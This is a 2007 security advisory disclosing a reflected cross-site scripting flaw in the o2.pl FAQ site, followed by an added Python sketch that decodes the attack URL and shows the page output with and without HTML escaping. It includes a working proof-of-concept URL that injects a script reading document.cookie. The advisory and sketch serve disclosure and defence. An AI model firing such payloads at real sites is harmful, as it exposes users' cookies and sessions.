kaneda@bohater.net
+ Subject:
XSS bug for pytanie.o2.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ pytanie.o2.pl Description:
pytanie.o2.pl is a "FAQ service", part of o2.pl, the most famous Polish web portal.
+ Description:
XSS IN:
http://pytanie.o2.pl/index.php?dzial=faq&nr_site=2&nr_kat=1&nam_kat=Wymagania%3Cscript%3Ealert(document.cookie);%3C/script%3E%20techniczne,%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem
It's nothing special, because this site has no authentication of any kind.
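Added example (not part of the original advisory and not o2.pl's code): a Python sketch that decodes the nam_kat value from the URL above, flags parameters carrying HTML metacharacters, and renders the same string with and without output encoding. How the site writes nam_kat into the page is an assumption (an <h2> here), and all function names are illustrative.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# URL taken from the advisory; the payload is its alert(document.cookie) proof of concept.
ADVISORY_URL = (
    "http://pytanie.o2.pl/index.php?dzial=faq&nr_site=2&nr_kat=1&nam_kat="
    "Wymagania%3Cscript%3Ealert(document.cookie);%3C/script%3E%20techniczne,"
    "%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem"
)


def query_params(url, charset="iso-8859-2"):
    """Split the query on '&' and percent-decode every value.

    %B1%E6 in the advisory URL are ISO-8859-2 bytes, so decoding them
    as UTF-8 would mangle the Polish letters.
    """
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[key] = unquote_plus(value, encoding=charset)
    return params


def params_with_markup(url):
    """Names of parameters whose decoded value contains '<' or '>'."""
    return [k for k, v in query_params(url).items() if "<" in v or ">" in v]


def render_unsafe(name):
    # Assumed shape of the flaw: the parameter is concatenated into HTML as-is.
    return "<h2>" + name + "</h2>"


def render_safe(name):
    # Output encoding for an HTML text context; quotes are escaped as well.
    return "<h2>" + html.escape(name, quote=True) + "</h2>"


if __name__ == "__main__":
    name = query_params(ADVISORY_URL)["nam_kat"]
    print("parameters with markup:", params_with_markup(ADVISORY_URL))
    print("unescaped:", render_unsafe(name))
    print("escaped:  ", render_safe(name))
```

With encoding applied, the category name is displayed as text and the script element never reaches the DOM.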
Timeline:
2007.03.04 bug discovered
2007.03.04 "/" bug sent via mail from http://kontakt.o2.pl
Original Advisory:
http://kaneda.bohater.net/security/20070304-xss-pytanie.o2.pl.php